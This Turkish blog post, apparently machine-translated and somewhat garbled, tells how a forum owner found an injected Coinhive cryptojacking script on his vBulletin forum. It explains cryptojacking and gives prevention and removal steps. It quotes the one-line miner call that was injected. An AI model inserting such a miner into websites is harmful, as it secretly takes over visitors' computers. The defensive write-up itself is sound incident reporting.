Web sitenizden Coinhive kripto-madenciliği nasıl çıkarılır

Genellikle her gün forumu ziyaret ediyorum ve bir gün önce görmemiştim. Bu yüzden, bunun gece boyunca biraz zaman geçtiğini, zamanımın uyurken olduğunu anlıyorum.

Forum için vBulletin yazılımını kullanıyorum ve en son sürüme güncellendi. Ayrıca, TheWindowsClub.com alan adı, çevrimiçi tehditlerden ve saldırılardan korunmak için Sucuri Web Antivirüs ve Güvenlik Duvarı `nu kullandığından bu bizim için oldukça şaşırtıcıydı.

PC güvenlik yazılımım kötü niyetli komut dosyasının çalışmasını başarıyla durdurdu. Windows 10 bilgisayarımda. Chrome ve Edge gibi diğer tarayıcılarla kontrol ettim ve sonuçlar aynıydı.

Forum web sayfasına sağ tıkladıktan ve kaynak kodunu kontrol ettikten sonra, bunun bir CryptoMiner zararlı bozuklu bozuk para olduğunu öğrendim.

Bu benim forum koduma giren kötü niyetli Coinhive Javascript:

var madenci = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Her neyse, yaptığım ilk şey forum aşağı ve Sucuri bilgilendirmek.

Sucuri millet, forumumu birkaç saat içinde itti ve o kadar iyi oldu. CoinHive nedir

Coinhive sunuyor Monero cryptocurrency için bir JavaScript madencisi web sitenize gömün ve web sitesi ziyaretçilerinin bilgisayar CPU`larını sizin için madeni paralarla kullanmayın.

Buna

Cryptojacking denir. Kullanıcıların kripto para birimi madenciliği için tarayıcılarını ele geçirmeyi içerir. Bazı web sitesi sahipleri para kazanmak için kendileri kullanabilirler - ama bizim durumumuzda, enjekte edilmişti. Bir kullanıcı virüslü siteye eriştiğinde, Coinhive JavaScript, kullanıcının CPU kaynaklarını kullanarak Monero`yu yürütür ve işletir. Bu, kurbanın makinesinin CPU küçültme ve beklenmedik sistem çökmesine yol açabilir.

Eğer tarayıcınız bulaştırılmışsa, kaynak kullanımınızın artacağını göreceksiniz. Tarayıcıyı kapatın ve düşecektir. Kullanıcı makinasının ısındığını, fanın hızlı çalıştığını veya pilin hızla boşaldığını fark edebilir.

İş arkadaşım Saurabh Mukhekar`ın

Mac kullanarak forumumu ziyaret etmesini ve ne olduğunu görmesini istedim. Eh, onun Mac bilgisayarı da o Safari ile forum açıldığında etkilendi! Mac için bir virüsten koruma yazılımı kullanan akıllı Mac OSX kullanıcılarından biridir. Mac için Avast antivirüsü kötü niyetli komut dosyasının çalışmasını başarıyla durdurdu. Saurabh,

CoinHive zararlı yazılımları, tarayıcı tabanlı bir Javascript enfeksiyonu olduğundan, yalnızca bir Windows Pc`yi değil, aynı zamanda Mac`leri de kaçırıyor. Mac`lerin bir antivirüs yazılımına ihtiyaç duymadığı bir efsaneye dayanamıyorum, aksi takdirde makinem enfekte olacaktı ve Mac`im başka biri için paraları çıkarmaya devam edecek.

CoinHive`ın web sitenizi etkilemesini önleyin.

1. Sitenizde veya forumunuzda NULL şablonlarını veya eklentileri kullanmayın
2. CMS`inizi en güncel sürüme güncel tutun.
3. Barındırma yazılımınızı düzenli olarak güncelleyin (PHP, Veritabanı, vb.).
4. Web sitenizi Sucuri, Cloudflare, Wordfence, vb. Web güvenlik sağlayıcıları ile koruyun.
5. Blogunuzu güvenceye almak için temel önlemleri alın.

CoinHive web sitesinden kaldırılıyor

Her şeyden önce webmaster olmanız gerekiyor. virüslü web sitesi - veya tüm web sitesi dosyalarına erişmenizi sağlayan yönetici kimlik bilgilerine sahip olmalısınız.

Artık antivirüsünüz CoinHive bulaşmasını tespit ettiğinde, web sayfasına sağ tıklayın ve Kaynak Kodunu seçin. Sonraki Ctrl + F tuşlarına basın ve “CoinHive” için arama yapın.

Kötü amaçlı kodun yerini belirledikten sonra, konumunun nerede olduğunu görmeniz gerekir. Şimdi manuel olarak kaldırmanız gerekiyor. Bunu yapmak için, platformunuzun biraz kodlama bilgisine ihtiyacınız var. Virüslü dosyayı / dosyaları bulmanız ve yukarıdaki komut dosyasını el ile kaldırmanız gerekir. Bundan emin değilseniz, lütfen bunu yapmak için bir uzmana danışınız. Sucuri`yi kullandığımız için, bunu yapmasına izin veriyoruz.

Bunu yaptıktan sonra, sunucu ve tarayıcı önbelleğini temizleyin. Herhangi bir önbellek eklentisi kullanıyorsanız veya MaxCDN kullanıyorsanız, bu önbellekleri de temizleyin.

Kendinizi kripto madenciliğine karşı koruyun

Kripto para birimleri ve Blockchain teknolojisi dünyayı ele geçiriyor. Küresel ekonomi üzerinde bir etki yaratmakta ve teknoloji bozulmalarına neden olmaktadır. Herkes böyle karlı bir pazara odaklanmaya başladı - ve bu da web sitesi korsanlarını da içeriyor. Getiri arttıkça, bu tür teknolojilerin yanlış kullanılmasını beklemeliyiz. Bu gelişmekte olan teknolojinin karanlık yüzüdür.

Yapabileceğimiz her şey mümkün olan en iyi önlemleri almaktır. İyi bir güvenlik yazılımı kullanmanın yanı sıra, web sitelerini Cryptocurrency kullanmak için CPU`larınızı kullanmasını engelleyen bir Chrome veya Firefox eklentisi kullanın - veya daha iyisi, Hosts dosyanızı değiştirerek Cryptojacking Mining Script saldırılarını durduracak Anti-WebMiner kullanın. Tüm tarayıcılarda çalışır. Bir Mac kullanıcısıysanız, lütfen bilgisayarınız için bir virüsten koruma yazılımı edinin.

Zararlı bir önlem olarak, virüslü bir siteyi ziyaret etmiş olabileceğinizi düşünüyorsanız, tarayıcınızı temizlemeniz iyi olur. Makinenizi antivirüs yazılımınızın yanı sıra AdwCleaner ile önbelleğe alın ve tarayın.

Güvende kalın, uyanık olun!